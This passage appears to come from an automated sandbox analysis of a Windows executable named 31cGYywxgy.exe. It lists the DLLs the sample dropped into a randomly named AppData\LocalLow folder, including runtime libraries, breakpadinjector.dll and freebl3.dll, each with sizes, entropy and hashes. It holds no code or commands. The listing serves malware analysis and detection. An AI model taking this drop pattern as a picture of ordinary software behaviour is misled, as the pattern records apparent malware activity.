                                                                                                  SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                                                  SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.1117101479630005
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                                                  MD5:6DB54065B33861967B491DD1C8FD8595
                                                                                                  SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                                                  SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                                                  SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.174986589968396
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                                                  MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                                                  SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                                                  SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                                                  SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17856
                                                                                                  Entropy (8bit):7.076803035880586
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                                                  MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                                                  SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                                                  SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                                                  SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.131154779640255
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                                                  MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                                                  SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                                                  SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                                                  SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20792
                                                                                                  Entropy (8bit):7.089032314841867
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                                                  MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                                                  SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                                                  SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                                                  SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.101895292899441
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                                                  MD5:D500D9E24F33933956DF0E26F087FD91
                                                                                                  SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                                                  SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                                                  SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.16337963516533
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                                                  MD5:6F6796D1278670CCE6E2D85199623E27
                                                                                                  SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                                                  SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                                                  SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19248
                                                                                                  Entropy (8bit):7.073730829887072
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                                                  MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                                                  SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                                                  SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                                                  SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19392
                                                                                                  Entropy (8bit):7.082421046253008
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                                                  MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                                                  SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                                                  SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                                                  SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.1156948849491055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                                                  MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                                                  SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                                                  SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                                                  SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17712
                                                                                                  Entropy (8bit):7.187691342157284
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                                                  MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                                                  SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                                                  SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                                                  SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17720
                                                                                                  Entropy (8bit):7.19694878324007
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                                                  MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                                                  SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                                                  SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                                                  SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.137724132900032
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                                                  MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                                                  SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                                                  SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                                                  SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20280
                                                                                                  Entropy (8bit):7.04640581473745
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                                                  MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                                                  SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                                                  SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                                                  SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.138910839042951
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                                                  MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                                                  SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                                                  SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                                                  SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19248
                                                                                                  Entropy (8bit):7.072555805949365
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                                                  MD5:19A40AF040BD7ADD901AA967600259D9
                                                                                                  SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                                                  SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                                                  SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18224
                                                                                                  Entropy (8bit):7.17450177544266
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                                                  MD5:BABF80608FD68A09656871EC8597296C
                                                                                                  SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                                                  SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                                                  SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.1007227686954275
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.088693688879585
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22328
                                                                                                  Entropy (8bit):6.929204936143068
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18736
                                                                                                  Entropy (8bit):7.078409479204304
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20280
                                                                                                  Entropy (8bit):7.085387497246545
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.060393359865728
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.13172731865352
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):28984
                                                                                                  Entropy (8bit):6.6686462438397
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26424
                                                                                                  Entropy (8bit):6.712286643697659
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):73016
                                                                                                  Entropy (8bit):5.838702055399663
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.076072254895036
                                                                                                  Encrypted:false
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22840
                                                                                                  Entropy (8bit):6.942029615075195
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                                                                  MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                                                                  SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                                                                  SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                                                                  SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24368
                                                                                                  Entropy (8bit):6.873960147000383
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                                                                  MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                                                                  SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                                                                  SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                                                                  SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23488
                                                                                                  Entropy (8bit):6.840671293766487
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                                                                  MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                                                                  SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                                                                  SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                                                                  SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20792
                                                                                                  Entropy (8bit):7.018061005886957
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                                                                  MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                                                                  SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                                                                  SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                                                                  SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.127951145819804
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                                                                  MD5:B52A0CA52C9C207874639B62B6082242
                                                                                                  SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                                                                  SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                                                                  SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):117712
                                                                                                  Entropy (8bit):6.598338256653691
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
                                                                                                  MD5:A436472B0A7B2EB2C4F53FDF512D0CF8
                                                                                                  SHA1:963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
                                                                                                  SHA-256:87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
                                                                                                  SHA-512:89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):334288
                                                                                                  Entropy (8bit):6.808908775107082
                                                                                                  Encrypted:false
